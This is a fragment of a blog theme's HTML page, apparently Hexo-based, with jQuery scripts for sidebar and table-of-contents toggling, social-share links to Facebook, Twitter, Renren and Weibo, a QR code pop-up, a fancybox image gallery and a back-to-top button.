    a.addClass('fadeOut').css('display', 'none');
    o.css('display', 'block').addClass('fadeIn');
    m.addClass('moveMain');
  });
  o.click(function(){
    o.css('display', 'none').removeClass('beforeFadeIn');
    a.css('display', 'block').removeClass('fadeOut').addClass('fadeIn');      
    m.removeClass('moveMain');
  });
  $(window).scroll(function(){
    o.css("top",Math.max(80,260-$(this).scrollTop()));
  });
  
  $(window).resize(function(){
    getSize(); 
    if (myWidth >= 1024) {
      $('header nav').removeClass('shownav');
    }else{
      m.removeClass('moveMain');
      a.css('display', 'block').removeClass('fadeOut');
      o.css('display', 'none');
      
      $('#toc.toc-aside').css('display', 'none');
        
    }
  });
});
</script>

<script type="text/javascript">
$(document).ready(function(){ 
  var ai = $('.article-content>iframe'),
      ae = $('.article-content>embed'),
      t  = $('#toc'),
      ta = $('#toc.toc-aside'),
      o  = $('.openaside'),
      c  = $('.closeaside');
  if(ai.length>0){
    ai.wrap('<div class="video-container" />');
  };
  if(ae.length>0){
   ae.wrap('<div class="video-container" />');
  };
  c.click(function(){
    ta.css('display', 'block').addClass('fadeIn');
  });
  o.click(function(){
    ta.css('display', 'none');
  });
  $(window).scroll(function(){
    ta.css("top",Math.max(140,320-$(this).scrollTop()));
  });
});
</script>


<script type="text/javascript">
$(document).ready(function(){ 
  var $this = $('.share'),
      url = $this.attr('data-url'),
      encodedUrl = encodeURIComponent(url),
      title = $this.attr('data-title'),
      tsina = $this.attr('data-tsina'),
      description = $this.attr('description');
  var html = [
  '<div class="hoverqrcode clearfix"></div>',
  '<a class="overlay" id="qrcode"></a>',
  '<a href="https://www.facebook.com/sharer.php?u=' + encodedUrl + '" class="article-share-facebook" target="_blank" title="Facebook"></a>',
  '<a href="https://twitter.com/intent/tweet?url=' + encodedUrl + '" class="article-share-twitter" target="_blank" title="Twitter"></a>',
  '<a href="#qrcode" class="article-share-qrcode" title="微信"></a>',
  '<a href="http://widget.renren.com/dialog/share?resourceUrl=' + encodedUrl + '&srcUrl=' + encodedUrl + '&title=' + title +'" class="article-share-renren" target="_blank" title="人人"></a>',
  '<a href="http://service.weibo.com/share/share.php?title='+title+'&url='+encodedUrl +'&ralateUid='+ tsina +'&searchPic=true&style=number' +'" class="article-share-weibo" target="_blank" title="微博"></a>',
  '<span title="Share to"></span>'
  ].join('');
  $this.append(html);

  $('.hoverqrcode').hide();

  var myWidth = 0;
  function updatehoverqrcode(){
    if( typeof( window.innerWidth ) == 'number' ) {
      myWidth = window.innerWidth;
    } else if( document.documentElement && document.documentElement.clientWidth) {
      myWidth = document.documentElement.clientWidth;
    };
    var qrsize = myWidth > 1024 ? 200:100;
    var options = {render: 'image', size: qrsize, fill: '#2ca6cb', text: url, radius: 0.5, quiet: 1};
    var p = $('.article-share-qrcode').position();
    $('.hoverqrcode').empty().css('width', qrsize).css('height', qrsize)
                          .css('left', p.left-qrsize/2+20).css('top', p.top-qrsize-10)
                          .qrcode(options);
  };
  $(window).resize(function(){
    $('.hoverqrcode').hide();
  });
  $('.article-share-qrcode').click(function(){
    updatehoverqrcode();
    $('.hoverqrcode').toggle();
  });
  $('.article-share-qrcode').hover(function(){}, function(){
      $('.hoverqrcode').hide();
  });
});   
</script>











<link rel="stylesheet" href="/fancybox/jquery.fancybox.css" media="screen" type="text/css">
<script src="/fancybox/jquery.fancybox.pack.js"></script>
<script type="text/javascript">
$(document).ready(function(){ 
  $('.article-content').each(function(i){
    $(this).find('img').each(function(){
      if ($(this).parent().hasClass('fancybox')) return;
      var alt = this.alt;
      if (alt) $(this).after('<span class="caption">' + alt + '</span>');
      $(this).wrap('<a href="' + this.src + '" title="' + alt + '" class="fancybox"></a>');
    });
    $(this).find('.fancybox').each(function(){
      $(this).attr('rel', 'article' + i);
    });
  });
  if($.fancybox){
    $('.fancybox').fancybox();
  }
}); 
</script>



<!-- Analytics Begin -->





<!-- Analytics End -->

<!-- Totop Begin -->

	<div id="totop">
	<a title="返回顶部"><img src="/img/scrollup.png"/></a>
	</div>
	<script src="/js/totop.js"></script>

<!-- Totop End -->

<!-- MathJax Begin -->
<!-- mathjax config similar to math.stackexchange -->


<!-- MathJax End -->

<!-- Tiny_search Begin -->

<!-- Tiny_search End -->

  </body>
</html>
